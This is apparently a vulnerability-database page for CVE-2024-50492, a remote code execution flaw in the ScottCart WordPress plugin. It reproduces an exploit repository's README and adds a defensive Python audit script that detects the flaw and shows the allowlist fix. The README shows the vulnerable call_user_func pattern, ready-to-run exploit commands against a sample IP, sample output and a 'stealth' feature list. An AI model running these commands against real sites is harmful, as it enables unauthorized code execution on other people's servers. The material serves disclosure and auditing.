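Related vulnerability
Title:
WordPress plugin ScottCart code injection vulnerability
(CVE-2024-50492)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin ScottCart version 1.1 and earlier contain a code injection vulnerability, which stems from improper control of code generation and results in code injection.
Description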
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
Introduction
# 🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE Exploit
> 🔥 Exploit Script for ScottCart <= 1.1 - Unauthenticated Remote Code Execution
> 🧑‍💻 By Nxploit – *Khaled Alenazi*
---
## 📌 Description
The **ScottCart** plugin for WordPress (versions ≤ 1.1) is vulnerable to **Remote Code Execution (RCE)**.
This allows **unauthenticated attackers** to execute arbitrary PHP functions on the server through a vulnerable AJAX endpoint.
- **Plugin**: ScottCart ≤ 1.1
- **Vulnerability**: Unauthenticated Function Injection → RCE
- **CVE**: CVE-2024-50492
- **CVSS Score**: **9.8 - Critical**
---
## 🧠 How it works
The plugin registers an unprotected AJAX action:
```php
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
```
Which executes:
```php
call_user_func($_POST['function']);
```
Allowing attackers to call **any existing PHP function**, like:
- `phpinfo()`
- `scottcart_get_the_user_ip()`
- `system()` ← if extended in modified environments
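A source audit for the pattern described above, as an added example that is not part of the original repository: it flags `wp_ajax_nopriv_*` hooks whose callback passes request data straight into a dynamic call. The sample source and the `demo_ping` names are constructed for illustration, and the check is a heuristic that only sees a superglobal used directly as the first argument.

```python
import re

# Constructed sample modelled on the two snippets above; not the plugin's real file.
SAMPLE_PHP = r"""<?php
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
function scottcart_load_function_callback() {
    call_user_func($_POST['function']);
    wp_die();
}
add_action('wp_ajax_nopriv_demo_ping', 'demo_ping_callback');
function demo_ping_callback() {
    $allowed = array('ping' => 'demo_ping');
    $key = isset($_POST['op']) ? $_POST['op'] : '';
    if (isset($allowed[$key])) { call_user_func($allowed[$key]); }
    wp_die();
}
"""

# AJAX actions registered for visitors who are not logged in.
HOOK = re.compile(r"add_action\(\s*['\"]wp_ajax_nopriv_(\w+)['\"]\s*,\s*['\"](\w+)['\"]")
# Dynamic-call sinks whose first argument is read directly from request data.
SINK = re.compile(r"\b(call_user_func(?:_array)?)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")

def function_body(src, name):
    """Return the brace-balanced body of PHP function `name`, or '' (ignores braces in strings)."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit(src):
    """List (action, callback, sink, superglobal) for unauthenticated hooks that reach a sink."""
    findings = []
    for action, callback in HOOK.findall(src):
        for sink, source in SINK.findall(function_body(src, callback)):
            findings.append((action, callback, sink, "$_" + source))
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_PHP):
        print("unauthenticated dynamic call: %s -> %s: %s(%s[...])" % f)
```

The second handler in the sample is not flagged because it resolves the request value through a fixed allowlist before calling anything, which is the shape a fix for this class of bug takes.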
---
## 🚀 Exploit Features
- ✅ Automatically sends crafted payload to trigger the vulnerable endpoint
- ✅ Allows function override via argument
- ✅ Default payload: `phpinfo()` for PoC
- ✅ Saves output to timestamped file (e.g., `results_2025-03-26_14-33-01.txt`)
- ✅ Custom `User-Agent`, error handling, and SSL ignore for stealth
---
## 🖥️ Usage
```bash
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Function to call (default: phpinfo)
```
---
## 💡 Examples
### 🔍 Default behavior (PoC with `phpinfo()`):
```bash
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
```
### 🔎 Call internal plugin function:
```bash
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
```
---
## 🧾 Output Example
```
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:
PHP Version => 8.1.12
...
```
📁 And saved in: `results_2025-03-26_14-33-01.txt`
---
## 🛡️ Disclaimer
This tool is for **educational and authorized testing** purposes only.
Do **not** use against systems you do not own or have explicit permission to test.
---
## 💬 Credits
- 💻 Exploit by: [Nxploit – Khaled Alenazi](https://github.com/Nxploited)
- 🛡️ CVE ID: CVE-2024-50492
File snapshot
[4.0K] /data/pocs/eb24fe31c878a7e9082f07d22dc46377e6b9db30
├── [2.7K] CVE-2024-50492.py
├── [1.1K] LICENSE
├── [2.6K] README.md
└── [ 15] requirements.txt
0 directories, 4 files